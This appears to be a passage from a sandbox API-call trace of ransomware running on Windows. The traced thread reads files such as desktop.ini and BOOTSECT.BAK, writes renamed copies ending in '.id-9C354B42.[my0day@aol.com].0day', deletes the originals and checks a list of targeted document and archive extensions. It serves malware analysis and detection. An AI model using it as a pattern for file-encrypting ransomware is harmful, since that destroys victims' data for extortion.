GetTickCount () returned 0x1c447 [0050.350] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.599] GetTickCount () returned 0x1c541 [0050.599] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0051.501] GetTickCount () returned 0x1c8ca [0051.501] GetTickCount () returned 0x1c8ca [0051.501] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0051.866] GetTickCount () returned 0x1ca31 [0051.866] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.052] GetTickCount () returned 0x1caec [0052.052] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.378] GetTickCount () returned 0x1cc33 [0052.378] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.498] GetTickCount () returned 0x1ccb0 [0052.498] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0052.652] GetTickCount () returned 0x1cd4c [0052.652] GetTickCount () returned 0x1cd4c [0052.652] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.443] GetTickCount () returned 0x1d058 [0053.443] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.554] GetTickCount () returned 0x1d0d5 [0053.554] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0053.774] GetTickCount () returned 0x1d1af [0053.774] GetTickCount () returned 0x1d1af [0053.775] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.105] GetTickCount () returned 0x1d2f7 [0054.105] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0054.964] GetTickCount () returned 0x1d651 [0054.964] GetTickCount () returned 0x1d651 [0054.964] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0055.255] GetTickCount () returned 0x1d779 [0055.255] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0055.579] GetTickCount () returned 0x1d8b1 [0055.579] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0056.429] GetTickCount () returned 0x1dc0b [0056.429] GetTickCount () returned 0x1dc0b [0056.429] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0056.567] GetTickCount () returned 0x1dc98 [0056.567] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0057.030] GetTickCount () returned 0x1de1e [0057.031] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0057.423] GetTickCount () returned 0x1dfb3 [0057.423] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0057.601] GetTickCount () returned 0x1e05f [0057.601] GetTickCount () returned 0x1e05f [0057.601] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0057.746] GetTickCount () returned 0x1e0eb [0057.746] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0057.943] GetTickCount () returned 0x1e1b6 [0057.943] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0058.072] GetTickCount () returned 0x1e233 [0058.072] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0058.175] GetTickCount () returned 0x1e2a0 [0058.175] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0058.397] GetTickCount () returned 0x1e37b [0058.397] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) Thread: id = 9 os_tid = 0xaa0 [0032.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x66fa70 [0032.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x67fa78 [0032.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640278 [0032.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x62a370 [0032.542] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640290 [0032.542] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3020020 [0032.542] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402a8 [0032.542] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6402a8, Size=0x20) returned 0x625c08 [0032.542] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402a8 [0032.542] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6402a8, Size=0x20) returned 0x625d70 [0032.542] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.542] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.542] Wow64DisableWow64FsRedirection (in: OldValue=0x22dff58 | out: OldValue=0x22dff58*=0x0) returned 1 [0032.542] lstrlenW (lpString="kernel32.dll") returned 12 [0032.542] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.542] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.542] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d70 | out: hHeap=0x5f0000) returned 1 [0032.542] Sleep (dwMilliseconds=0x64) [0032.736] Sleep (dwMilliseconds=0x64) [0033.039] lstrcmpiW (lpString1=".ini", lpString2=".0day") returned 1 [0033.039] lstrlenW (lpString="desktop.ini") returned 11 [0033.039] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0033.040] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=129) returned 1 [0033.040] CloseHandle (hObject=0x164) returned 1 [0033.040] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0033.040] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.040] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0033.040] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.040] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.040] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.041] GetLastError () returned 0x0 [0033.041] ReadFile (in: hFile=0x164, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x81, lpOverlapped=0x0) returned 1 [0033.115] WriteFile (in: hFile=0x16c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x90, lpOverlapped=0x0) returned 1 [0033.116] ReadFile (in: hFile=0x164, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0033.116] WriteFile (in: hFile=0x16c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0033.116] SetEndOfFile (hFile=0x16c) returned 1 [0033.117] CloseHandle (hObject=0x16c) returned 1 [0033.118] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.118] SetEndOfFile (hFile=0x164) returned 1 [0033.119] CloseHandle (hObject=0x164) returned 1 [0033.119] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x26) returned 1 [0033.119] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0033.119] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".doc") returned 4 [0033.120] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.120] lstrlenW (lpString=".docx") returned 5 [0033.120] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.120] lstrlenW (lpString=".pdf") returned 4 [0033.120] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString=".xls") returned 4 [0033.120] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString=".xlsx") returned 5 [0033.120] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0033.120] lstrlenW (lpString=".ppt") returned 4 [0033.120] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".zip") returned 4 [0033.120] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString=".rar") returned 4 [0033.120] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString=".bz2") returned 4 [0033.120] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.120] lstrlenW (lpString=".7z") returned 3 [0033.120] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".dbf") returned 4 [0033.120] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".1cd") returned 4 [0033.120] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".jpg") returned 4 [0033.120] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.120] lstrlenW (lpString=".doc") returned 4 [0033.121] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.121] lstrlenW (lpString=".docx") returned 5 [0033.121] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.121] lstrlenW (lpString=".pdf") returned 4 [0033.121] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0033.121] lstrlenW (lpString=".xls") returned 4 [0033.121] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0033.121] lstrlenW (lpString=".xlsx") returned 5 [0033.121] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0033.121] lstrlenW (lpString=".ppt") returned 4 [0033.121] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0033.121] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.121] lstrlenW (lpString=".zip") returned 4 [0033.121] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0033.121] lstrlenW (lpString=".rar") returned 4 [0033.121] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0033.121] lstrlenW (lpString=".bz2") returned 4 [0033.121] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.121] lstrlenW (lpString=".7z") returned 3 [0033.121] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.121] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.121] lstrlenW (lpString=".dbf") returned 4 [0033.121] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.121] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.121] lstrlenW (lpString=".1cd") returned 4 [0033.121] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.121] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.121] lstrlenW (lpString=".jpg") returned 4 [0033.121] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0033.121] lstrcmpiW (lpString1=".BAK", lpString2=".0day") returned 1 [0033.121] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0033.122] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0033.137] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=8192) returned 1 [0033.137] CloseHandle (hObject=0x164) returned 1 [0033.137] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0033.137] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootsect.bak.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.137] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0033.138] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0033.138] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.138] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.138] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootsect.bak.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.140] GetLastError () returned 0x0 [0033.140] ReadFile (in: hFile=0x164, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x2000, lpOverlapped=0x0) returned 1 [0033.150] WriteFile (in: hFile=0x16c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x2010, lpOverlapped=0x0) returned 1 [0033.151] ReadFile (in: hFile=0x164, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0033.151] WriteFile (in: hFile=0x16c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.151] SetEndOfFile (hFile=0x16c) returned 1 [0033.152] CloseHandle (hObject=0x16c) returned 1 [0033.152] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.152] SetEndOfFile (hFile=0x164) returned 1 [0033.153] CloseHandle (hObject=0x164) returned 1 [0033.153] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x27) returned 1 [0033.153] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString=".doc") returned 4 [0033.154] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".docx") returned 5 [0033.154] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0033.154] lstrlenW (lpString=".pdf") returned 4 [0033.154] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".xls") returned 4 [0033.154] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".xlsx") returned 5 [0033.154] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0033.154] lstrlenW (lpString=".ppt") returned 4 [0033.154] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString=".zip") returned 4 [0033.154] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".rar") returned 4 [0033.154] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".bz2") returned 4 [0033.154] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString=".7z") returned 3 [0033.154] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString=".dbf") returned 4 [0033.154] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString=".1cd") returned 4 [0033.154] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.154] lstrlenW (lpString=".jpg") returned 4 [0033.154] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0033.154] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString=".doc") returned 4 [0033.155] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".docx") returned 5 [0033.155] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0033.155] lstrlenW (lpString=".pdf") returned 4 [0033.155] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".xls") returned 4 [0033.155] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".xlsx") returned 5 [0033.155] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0033.155] lstrlenW (lpString=".ppt") returned 4 [0033.155] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString=".zip") returned 4 [0033.155] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".rar") returned 4 [0033.155] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".bz2") returned 4 [0033.155] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString=".7z") returned 3 [0033.155] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0033.155] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString=".dbf") returned 4 [0033.155] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0033.155] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString=".1cd") returned 4 [0033.155] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0033.155] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0033.155] lstrlenW (lpString=".jpg") returned 4 [0033.155] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0033.156] Sleep (dwMilliseconds=0x64) [0033.938] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.938] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0033.938] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.106] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1450) returned 1 [0034.106] CloseHandle (hObject=0x184) returned 1 [0034.106] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0034.106] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.106] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.106] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.107] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.107] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.107] GetLastError () returned 0x0 [0034.107] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x5aa, lpOverlapped=0x0) returned 1 [0034.108] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.109] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.109] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.109] SetEndOfFile (hFile=0x188) returned 1 [0034.109] CloseHandle (hObject=0x188) returned 1 [0034.110] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.110] SetEndOfFile (hFile=0x184) returned 1 [0034.111] CloseHandle (hObject=0x184) returned 1 [0034.111] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.111] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0034.111] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.111] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.111] lstrlenW (lpString=".doc") returned 4 [0034.111] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.111] lstrlenW (lpString=".docx") returned 5 [0034.111] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.111] lstrlenW (lpString=".pdf") returned 4 [0034.111] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".xls") returned 4 [0034.112] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".xlsx") returned 5 [0034.112] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.112] lstrlenW (lpString=".ppt") returned 4 [0034.112] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.112] lstrlenW 